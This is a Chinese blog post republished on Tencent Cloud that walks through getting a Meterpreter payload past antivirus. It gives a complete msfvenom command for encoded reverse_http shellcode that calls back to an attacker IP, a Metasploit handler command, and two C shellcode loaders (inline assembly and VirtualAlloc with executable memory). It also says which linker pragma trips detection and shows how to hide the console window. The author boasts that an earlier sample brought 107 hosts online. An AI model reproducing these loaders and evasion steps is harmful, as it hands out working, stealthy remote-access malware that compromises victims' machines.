前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >简单的源码免杀过av

简单的源码免杀过av

作者头像
Gcow安全团队
发布2020-09-14 14:56:43
1.4K0
发布2020-09-14 14:56:43
举报
文章被收录于专栏:Gcow安全团队Gcow安全团队

1、前言

经常看到各种免杀的例子,源码免杀、二进制免杀、加载器免杀等等,最近来学习了一下源码层面的免杀,在实验过程中与杀软对抗最终成功免杀,写下本文做个记录。

2、shellcode生成和二进制文件编译

开始前有个小插曲,用360扫了扫之前编译的样本,当时v站查杀率1/72(提交到v站后cs一共上线了107台主机,emm):

今天扫描的时候:

啊... Q哒不妞Q(Qwq)

好了不说了,进入正题,首先我们使用msfvenom生成C语言shellcode:

代码语言:javascript
复制
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_http -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=192.168.8.102 LPORT=6666 -f c

然后网上找了一段C语言加载shellcode的代码。

通过内联汇编加载shellcode:

代码语言:javascript
复制
#include<stdio.h>
#include<windows.h>
#include <time.h>
#pragma comment(linker, "/OPT:nowin98")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口
unsigned char buf[] ="shellcode";
int main(int argc,char const *argv[])
{
  //内联汇编
  __asm   
  {   
    lea eax,buf;   
    call eax;   
  }
}

话不多说,先编译上线测试,启动msf监听:

代码语言:javascript
复制
handler -p windows/meterpreter/reverse_http -H 0.0.0.0 -P 6666

另一边编译源码,生成exe:

双击执行exe,msf上线:

执行过程发现没有被拦截,看起来这已经免杀了:

好的,免杀成功,本文结束。

3、VS免杀测试

结束是不可能结束的,不然怎么混篇幅,只能换个不免杀的编译器,被杀了再随便改改源码这样子。

用VS2019来编译源码,启动vs:

是吧,被发现了,我们将恶意代码全部删除后编译,发现还是被杀:

emmm? 怎么办啊,这都杀!? 其实有朋友应该注意到了下面这段代码,好吧 ,我是故意没删的,因为特征就是在这:

代码语言:javascript
复制
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")

接下来将这段代码删除,重新生成exe,然后进行扫描,发现成功过了杀软:

vs编译的这个内联加载不能正常上线,修改下加载方法:

代码语言:javascript
复制
#include<stdio.h>
#include<windows.h>
#include <time.h>
int main(int argc, char const* argv[])
{  
unsigned char buf[] ="shellcode";
  void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  memcpy(exec, buf, sizeof buf);
  ((void(*)())exec)();
  return 0;
}

那么编译执行后会有个DOS窗口:

这里我们ShowWindow函数来隐藏窗体:

需要两个参数:

一个是程序窗口句柄,可以通过GetConsoleWindow 来获得当前窗口句柄,

另一个是int类型的nCmdShow,来控制窗口的状态,这里使用SW_HIDE来隐藏窗口:

代码语言:javascript
复制
ShowWindow(GetConsoleWindow(), SW_HIDE);

然后再编译执行和免杀测试,可以看到免杀且无窗口:

4、参考

https://www.zhihu.com/question/282945808 https://blog.csdn.net/zac_sian/article/details/46778285 https://docs.microsoft.com/en-us/windows/console/getconsolewindow https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-showwindow

end

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-09-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Gcow安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • https://www.zhihu.com/question/282945808 https://blog.csdn.net/zac_sian/article/details/46778285 https://docs.microsoft.com/en-us/windows/console/getconsolewindow https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-showwindow
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档